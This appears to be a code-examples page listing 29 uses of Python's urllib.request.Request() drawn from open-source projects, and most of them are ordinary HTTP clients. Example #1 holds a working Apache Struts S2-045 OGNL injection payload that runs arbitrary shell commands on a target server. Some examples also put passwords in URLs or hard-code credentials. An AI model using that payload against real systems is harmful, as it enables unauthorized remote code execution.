Python urllib.request.Request() Examples
The following are 29 code examples of urllib.request.Request(), collected from open-source projects. You can go to the original project or source file by following the attribution above each example. You may also want to check out the other available functions and classes of the module urllib.request.
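All of the examples below share the same basic shape: construct a Request from a URL plus optional headers or body, then fetch it with urlopen(). A minimal sketch of that pattern (the URL and header value are illustrative):

from urllib.request import Request, urlopen

# Plain GET with a custom User-Agent; many servers reject urllib's
# default agent string, which is why most examples below override it.
req = Request('https://example.com', headers={'User-Agent': 'Mozilla/5.0'})
with urlopen(req, timeout=10) as resp:
    body = resp.read()  # always bytes; decode explicitly if you need text
    print(resp.status, len(body))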
Example #1
Source File: apache_struts_all.py From Vxscan with Apache License 2.0
def st045(self):
    try:
        cmd = self.linux
        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        r = request.Request(self.url, headers=header)
        text = request.urlopen(r).read()
    except http.client.IncompleteRead as e:
        text = e.partial
    except Exception:
        pass
    if 'text' in locals().keys():
        self.random = str(self.random)
        if self.random.encode('utf-8') in text and len(text) < 15:
            self.result.append('Apache S2-045 Vulnerability: ' + self.url)
Example #2
Source File: githubpy.py From osint-scraper with MIT License
def get_access_token(self, code, state=None):
    '''
    In callback url: http://host/callback?code=123&state=xyz
    use code and state to get an access token.
    '''
    kw = dict(client_id=self._client_id, client_secret=self._client_secret, code=code)
    if self._redirect_uri:
        kw['redirect_uri'] = self._redirect_uri
    if state:
        kw['state'] = state
    opener = build_opener(HTTPSHandler)
    request = Request('https://github.com/login/oauth/access_token', data=_encode_params(kw))
    request.get_method = _METHOD_MAP['POST']
    request.add_header('Accept', 'application/json')
    try:
        response = opener.open(request, timeout=TIMEOUT)
        r = _parse_json(response.read())
        if 'error' in r:
            raise ApiAuthError(str(r.error))
        return str(r.access_token)
    except HTTPError as e:
        raise ApiAuthError('HTTPError when get access token')
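A side note on the get_method override above: since Python 3.3, Request also accepts the HTTP verb directly through its method argument, which avoids the monkey-patching. A minimal sketch (the URL and payload are illustrative placeholders):

from urllib.request import Request, urlopen

# method= replaces the get_method override on Python 3.3+;
# the token-exchange URL and body here are placeholders only.
req = Request('https://github.com/login/oauth/access_token',
              data=b'code=123&state=xyz', method='POST')
req.add_header('Accept', 'application/json')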
Example #3
Source File: log_json.py From dionaea with GNU General Public License v2.0
def submit(self, data):
    from urllib.request import Request, urlopen
    data = json.dumps(data)
    data = data.encode("ASCII")
    req = Request(
        self.url,
        data=data,
        headers={
            "Content-Type": "application/json"
        }
    )
    # ToDo: parse response
    response = urlopen(req)
    # Debug:
    # from pprint import pprint
    # pprint(response)
Example #4
Source File: crawler_yahoo_bs4.py From ir with Mozilla Public License 2.0
def busca_preco_atual(ticker):
    if ticker in __cache__:
        return __cache__[ticker]
    try:
        ticker_sa = ticker + '.SA'
        url = "http://finance.yahoo.com/quote/%s?p=%s" % (ticker_sa, ticker_sa)
        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()
        time.sleep(1)
        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')
        for span in soup.findAll('span', attrs={'class': 'Trsdu(0.3s) Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(b)'}):
            preco_atual = float(span.text.replace(',', '').strip())
            __cache__[ticker] = preco_atual
            return preco_atual
        raise Exception('Preco ticker nao encontrado ' + ticker)
    except Exception as ex:
        raise Exception('Preco ticker nao encontrado ' + ticker, ex)
Example #5
Source File: crawler_funds_explorer_bs4.py From ir with Mozilla Public License 2.0
def e_tipo_fii(ticker):
    ticker_corrigido = ticker
    if ticker.endswith('12'):
        ticker_corrigido = ticker.replace('12', '11')
    try:
        url = "https://www.fundsexplorer.com.br/funds/%s" % (ticker_corrigido)
        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()
        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')
        titles = soup.findAll('h1', attrs={'class': 'section-title'})
        if len(titles):
            return True
        else:
            return False
    except:
        return False
Example #6
Source File: client.py From d6tpipe with MIT License
def _make_request(self, opener, request, timeout=None):
    """Make the API call and return the response. This is separated into
    its own function, so we can mock it easily for testing.

    :param opener:
    :type opener:
    :param request: url payload to request
    :type request: urllib.Request object
    :param timeout: timeout value or None
    :type timeout: float
    :return: urllib response
    """
    timeout = timeout or self.timeout
    try:
        return opener.open(request, timeout=timeout)
    except HTTPError as err:
        exc = handle_error(err)
        return exc
Example #7
Source File: zooqle.py From search-plugins with GNU General Public License v2.0
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped. Note: this comparison assumes Python 2
    # strings; on Python 3, response.read() returns bytes, so the check
    # would need bytes literals and io.BytesIO.
    if dat[:2] == '\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        extracted_data = gzipper.read()
        dat = extracted_data
        return dat
    return dat
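On Python 3 the same gzip handling can be done on the bytes directly; a minimal sketch, assuming response is a standard http.client response object:

import gzip

dat = response.read()
# gzip streams start with the magic bytes 0x1f 0x8b
if dat[:2] == b'\x1f\x8b':
    dat = gzip.decompress(dat)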
Example #8
Source File: connection.py From dot2moon with MIT License
def post(self, payload, request_par):
    data = parse.urlencode(request_par).encode()
    if self.UserAgent != None:
        req = Request(
            self.target_url,
            data=data,
            headers={"User-Agent": self.UserAgent})
        conn = urlopen(req, timeout=self.TimeOut)
    else:
        conn = urlopen(self.target_url, data=data, timeout=self.TimeOut)
    html = conn.read().decode("utf-8")
    page_size = len(html)
    if self.verbose == True:
        print(" [+] Source code got from %s" % payload)
        print("----START" + "-"*71)
        print(html)
        print("----END" + "-"*73)
    return(self.target_url, page_size, html, payload)
Example #9
Source File: connection.py From dot2moon with MIT License
def HTML(self, check):
    try:
        if self.UserAgent != None:
            page_html = urlopen(
                Request(self.target_url, headers={"User-Agent": self.UserAgent}),
                timeout=self.TimeOut).read().decode("utf-8")
        # If not, the default will be used
        else:
            page_html = urlopen(
                self.target_url,
                timeout=self.TimeOut).read().decode("utf-8")
    except HTTPError:
        page_html = "Can't get page source code"
    if self.verbose == True:
        print(" [+] Source code got from %s" % self.target_url)
        print("----START" + "-"*71)
        print(page_html)
        print("----END" + "-"*73)
    return(page_html)
Example #10
Source File: load.py From pySHACL with Apache License 2.0
def get_rdf_from_web(url):
    headers = {'Accept': 'text/turtle, application/rdf+xml, '
                         'application/ld+json, application/n-triples,'
                         'text/plain'}
    r = request.Request(url, headers=headers)
    resp = request.urlopen(r)
    code = resp.getcode()
    if not (200 <= code <= 210):
        raise RuntimeError("Cannot pull RDF URL from the web: {}, code: {}"
                           .format(url, str(code)))
    known_format = None
    content_type = resp.headers.get('Content-Type', None)
    if content_type:
        if content_type.startswith("text/turtle"):
            known_format = "turtle"
        elif content_type.startswith("application/rdf+xml"):
            known_format = "xml"
        elif content_type.startswith("application/xml"):
            known_format = "xml"
        elif content_type.startswith("application/ld+json"):
            known_format = "json-ld"
        elif content_type.startswith("application/n-triples"):
            known_format = "nt"
    return resp, known_format
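Note the design here: the Accept header advertises the RDF serializations the caller can parse, and the response's Content-Type is mapped back to a parser name, so format negotiation happens entirely through those two HTTP headers.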
Example #11
Source File: utils.py From script.module.inputstreamhelper with MIT License
def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)
    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)
        req = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=req.getcode())
        if 400 <= req.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(
                line1=localize(30063), line2=localize(30065))):  # Internet down, try again?
            return _http_request(url, headers, time_out)
        return None
    return req
Example #12
Source File: recording.py From ReolinkCameraAPI with GNU General Public License v3.0
def get_snap(self, timeout: int = 3) -> Image or None:
    """
    Gets a "snap" of the current camera video data and returns a Pillow Image or None
    :param timeout: Request timeout to camera in seconds
    :return: Image or None
    """
    randomstr = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
    snap = self.url + "?cmd=Snap&channel=0&rs=" \
           + randomstr \
           + "&user=" + self.username \
           + "&password=" + self.password
    try:
        req = request.Request(snap)
        req.set_proxy(Request.proxies, 'http')
        # Pass the timeout as a keyword argument: the second positional
        # parameter of urlopen() is the POST body, not the timeout.
        reader = request.urlopen(req, timeout=timeout)
        if reader.status == 200:
            b = bytearray(reader.read())
            return Image.open(io.BytesIO(b))
        print("Could not retrieve data from camera successfully. Status:", reader.status)
        return None
    except Exception as e:
        print("Could not get Image data\n", e)
        raise
Example #13
Source File: character_stoke_handian.py From corpus_process_script with Apache License 2.0
def post_baidu(self, url):
    """
    :param url:
    :return:
    """
    try:
        timeout = 10
        # request = urllib2.Request(url)
        request = urllib2.Request(url)
        request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
        request.add_header('connection', 'keep-alive')
        request.add_header('referer', url)
        response = urllib2.urlopen(request, timeout=timeout)
        html = response.read()
        response.close()
        return html
    except Exception as e:
        print('URL Request Error:', e)
        return None
Example #14
Source File: __init__.py From pyhanlp with Apache License 2.0
def hanlp_releases(cache=True):
    global HANLP_RELEASES
    if cache and HANLP_RELEASES:
        return HANLP_RELEASES
    # print('Request GitHub API')
    req = urllib.Request('http://nlp.hankcs.com/download.php?file=version')
    req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36')
    # The original guarded this read on PY == 3, but both branches were identical
    content = urllib.urlopen(req).read()
    content = json.loads(content.decode())
    jar_version, jar_url, data_version, data_url = content
    meta = [(jar_version, jar_url, data_version, data_url)]
    HANLP_RELEASES = meta
    return meta
Example #15
Source File: pubchem.py From QCElemental with BSD 3-Clause "New" or "Revised" License
def get_sdf(self):
    """Function to return the SDF (structure-data file) of the PubChem object."""
    from urllib.request import urlopen, Request
    from urllib.parse import quote
    from urllib.error import URLError

    if len(self.dataSDF) == 0:
        url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/{}/SDF?record_type=3d".format(
            quote(str(self.cid))
        )
        req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"})
        try:
            self.dataSDF = urlopen(req).read().decode("utf-8")
        except URLError as e:
            msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e)
            msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n"
            print(msg)
            raise ValidationError(msg)
    return self.dataSDF
Example #16
Source File: deadseeker.py From Broken-Link-Crawler with MIT License
def handle_link(self, link):
    '''Send a HEAD request to the link, catch any pesky errors'''
    if not bool(urlparse(link).netloc):  # relative link?
        link = urljoin(self.home, link)
    try:
        req = Request(link, headers={'User-Agent': agent}, method='HEAD')
        status = request.urlopen(req).getcode()
    except urllib.error.HTTPError as e:
        print(f'HTTPError: {e.code} - {link}')  # (e.g. 404, 501, etc)
    except urllib.error.URLError as e:
        print(f'URLError: {e.reason} - {link}')  # (e.g. conn. refused)
    except ValueError as e:
        print(f'ValueError {e} - {link}')  # (e.g. missing protocol http)
    else:
        if self.verbose:  # check for verbose tag
            print(f'{status} - {link}')
        if self.home in link:
            self.pages_to_check.appendleft(link)
Example #17
Source File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py From L.E.S.M.A with Apache License 2.0
def build_request(url, data=None, headers=None, bump=''):
    """Build a urllib2 request object

    This function automatically adds a User-Agent header to all requests
    """
    if not USER_AGENT:
        build_user_agent()
    if not headers:
        headers = {}
    if url[0] == ':':
        schemed_url = '%s%s' % (SCHEME, url)
    else:
        schemed_url = url
    if '?' in url:
        delim = '&'
    else:
        delim = '?'
    # WHO YOU GONNA CALL? CACHE BUSTERS!
    final_url = '%s%sx=%s.%s' % (schemed_url, delim, int(timeit.time.time() * 1000), bump)
    headers.update({
        'User-Agent': USER_AGENT,
        'Cache-Control': 'no-cache',
    })
    printer('%s %s' % (('GET', 'POST')[bool(data)], final_url), debug=True)
    return Request(final_url, data=data, headers=headers)
Example #18
Source File: github.py From loghub with MIT License
def _http(self, _method, _path, **kw):
    data = None
    params = None
    if _method == 'GET' and kw:
        _path = '%s?%s' % (_path, _encode_params(kw))
    if _method in ['POST', 'PATCH', 'PUT']:
        data = bytes(_encode_json(kw), 'utf-8')
    url = '%s%s' % (_URL, _path)
    opener = build_opener(HTTPSHandler)
    request = Request(url, data=data)
    request.get_method = _METHOD_MAP[_method]
    if self._authorization:
        request.add_header('Authorization', self._authorization)
    if _method in ['POST', 'PATCH', 'PUT']:
        request.add_header('Content-Type', 'application/x-www-form-urlencoded')

    class Resp():
        code = None

    resp = Resp()
    req = None
    try:
        response = opener.open(request, timeout=TIMEOUT)
        is_json = self._process_resp(response.headers)
        if is_json:
            return _parse_json(response.read().decode('utf-8'))
    except HTTPError as e:
        is_json = self._process_resp(e.headers)
        if is_json:
            json = _parse_json(e.read().decode('utf-8'))
        else:
            json = e.read().decode('utf-8')
        req = JsonObject(method=_method, url=url)
        resp = JsonObject(code=e.code, json=json)
    finally:
        if resp.code == 404:
            raise ApiNotFoundError(url, req, resp)
        elif req:
            raise ApiError(url, req, resp)
Example #19
Source File: githubpy.py From osint-scraper with MIT License
def _http(self, _method, _path, **kw):
    data = None
    params = None
    if _method == 'GET' and kw:
        _path = '%s?%s' % (_path, _encode_params(kw))
    if _method in ['POST', 'PATCH', 'PUT']:
        data = bytes(_encode_json(kw), 'utf-8')
    url = '%s%s' % (_URL, _path)
    opener = build_opener(HTTPSHandler)
    request = Request(url, data=data)
    request.get_method = _METHOD_MAP[_method]
    if self._authorization:
        request.add_header('Authorization', self._authorization)
    if _method in ['POST', 'PATCH', 'PUT']:
        request.add_header('Content-Type', 'application/x-www-form-urlencoded')
    try:
        response = opener.open(request, timeout=TIMEOUT)
        is_json = self._process_resp(response.headers)
        if is_json:
            return _parse_json(response.read().decode('utf-8'))
    except HTTPError as e:
        is_json = self._process_resp(e.headers)
        if is_json:
            json = _parse_json(e.read().decode('utf-8'))
        else:
            json = e.read().decode('utf-8')
        req = JsonObject(method=_method, url=url)
        resp = JsonObject(code=e.code, json=json)
        if resp.code == 404:
            raise ApiNotFoundError(url, req, resp)
        raise ApiError(url, req, resp)
Example #20
Source File: search.py From rules-bot with GNU Affero General Public License v3.0
def parse_docs(self):
    request = Request(urljoin(DOCS_URL, "objects.inv"), headers={'User-Agent': USER_AGENT})
    docs_data = urlopen(request)
    self._docs = InventoryFile.load(docs_data, DOCS_URL, urljoin)
Example #21
Source File: infolog.py From vae_tacotron with MIT License
def _send_slack(msg):
    req = Request(_slack_url)
    req.add_header('Content-Type', 'application/json')
    urlopen(req, json.dumps({
        'username': 'tacotron',
        'icon_emoji': ':taco:',
        'text': '*%s*: %s' % (_run_name, msg)
    }).encode())
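urllib sends a POST whenever a body is supplied, whether to urlopen() as above or on the Request itself. A minimal sketch of the equivalent form with the body attached to the Request (the webhook URL is a placeholder):

import json
from urllib.request import Request, urlopen

payload = json.dumps({'text': 'hello'}).encode()
# data != None makes this a POST; the URL below is illustrative only
req = Request('https://hooks.slack.com/services/XXX', data=payload,
              headers={'Content-Type': 'application/json'})
urlopen(req)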
Example #22
Source File: character_stoke.py From corpus_process_script with Apache License 2.0
def post_baidu(self, url):
    try:
        timeout = 5
        request = urllib2.Request(url)
        request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36')
        request.add_header('connection', 'keep-alive')
        request.add_header('referer', url)
        response = urllib2.urlopen(request, timeout=timeout)
        html = response.read()
        response.close()
        return html
    except Exception as e:
        print('URL Request Error:', e)
        return None
Example #23
Source File: activity-debug-1.py From coding-skills-sample-code with Apache License 2.0
def get_content(uri):
    req = Request(uri)
    req.add_header('Authorization', 'Basic bGVhcm5pbmc6bGVhcm5pbmc=')
    req.add_header('Accept', 'application/json')
    response = urlopen(req)
    response_string = response.read().decode("utf-8")
    response.close()
    return response_string
Example #24
Source File: data_spider.py From dialogbot with Apache License 2.0
def get_html(self, url):
    """
    Request the HTML page for the given url.
    :param url: url
    :return:
    """
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) '
                             'Chrome/51.0.2704.63 Safari/537.36'}
    req = request.Request(url=url, headers=headers)
    res = request.urlopen(req)
    html = res.read().decode('gbk')
    return html
Example #25
Source File: utils.py From 2D-kinectics with MIT License
def get_blocked_videos(api=API):
    api_url = '{}?action=get_blocked'.format(api)
    req = urllib2.Request(api_url)
    response = urllib2.urlopen(req)
    return json.loads(response.read())
Example #26
Source File: get_banner.py From games_nebula with GNU General Public License v3.0
def get_banner(game_name, url, banner_path, lib):
    banner_req = urllib_request(url)
    try:
        if not os.path.exists(banner_path):
            os.makedirs(banner_path)
        banner_data = urllib_urlopen(banner_req).read()
        banner_file = open(banner_path + '/' + game_name + '.jpg', 'wb')
        banner_file.write(banner_data)
        banner_file.close()
        pic_src = Image.open(banner_path + '/' + game_name + '.jpg')
        pic = pic_src.resize((518, 240), PIL.Image.ANTIALIAS)
        pic.save(banner_path + '/' + game_name + '.jpg')
        if lib == 'goglib':
            if not os.path.exists(banner_path + '/unavailable/'):
                os.makedirs(banner_path + '/unavailable/')
            new_pic = Image.open(banner_path + '/' + game_name + '.jpg')
            pic_grey = new_pic.convert('L')
            pic_grey.save(banner_path + '/unavailable/' + game_name + '.jpg')
    except urllib_urlerror as e:
        print(e.reason)
    except urllib_httperror as e:
        print(e.code)
        print(e.read())
Example #27
Source File: goglib_get_banner.py From games_nebula with GNU General Public License v3.0
def goglib_get_banner(banner_path, unavailable_path, game_id, *args):
    banner_height = 240
    game_name = os.path.basename(banner_path).split('.jpg')[0]
    print("Getting picture for: '" + game_name + "'")
    try:
        token_path = os.getenv('HOME') + '/.config/lgogdownloader/galaxy_tokens.json'
        token = Token.from_file(token_path)
        if token.expired():
            token.refresh()
            token.save(token_path)
        api = GogApi(token)
        prod = api.product(game_id)
        prod.update_galaxy(expand=True)
        banner_url = 'https:' + ''.join(prod.image_logo.split('_glx_logo'))
        banner_req = urllib_request(banner_url)
        banner_data = urllib_urlopen(banner_req).read()
        banner_file = open(banner_path, 'wb')
        banner_file.write(banner_data)
        banner_file.close()
        pic_src = Image.open(banner_path)
        scale_lvl = banner_height/float(pic_src.size[1])
        scaled_width = int(float(pic_src.size[0])*scale_lvl)
        pic = pic_src.resize((scaled_width, banner_height), PIL.Image.ANTIALIAS)
        pic.save(banner_path)
        pic = pic.convert('L')
        pic.save(unavailable_path)
    except urllib_urlerror as e:
        print(e.reason)
    except urllib_httperror as e:
        print(e.code)
        print(e.read())
    except:
        goglib_recreate_banner.goglib_recreate_banner(game_name, banner_path)
Example #28
Source File: deadseeker.py From Broken-Link-Crawler with MIT License
def scanner(self):
    '''Loop through remaining pages, looking for HTML responses'''
    while self.pages_to_check:
        page = self.pages_to_check.pop()
        req = Request(page, headers={'User-Agent': agent})
        res = request.urlopen(req)
        if 'html' in res.headers['content-type']:
            with res as f:
                body = f.read().decode('utf-8', errors='ignore')
                self.feed(body)
Example #29
Source File: goglib_get_icon.py From games_nebula with GNU General Public License v3.0
def goglib_get_icon(game_name, icon_url, path):
    icon_req = urllib_request(icon_url)
    icon_data = urllib_urlopen(icon_req).read()
    icon_file = open(path + '/' + game_name + '.jpg', 'wb')
    icon_file.write(icon_data)
    icon_file.close()
    #pic_src = Image.open(path + '/' + game_name + '.jpg')
    #scale_lvl = 64/float(pic_src.size[0])
    #scaled_height = int(float(pic_src.size[1])*scale_lvl)
    #pic = pic_src.resize((64, scaled_height), PIL.Image.ANTIALIAS)
    #pic.save(path + '/' + game_name + '.jpg')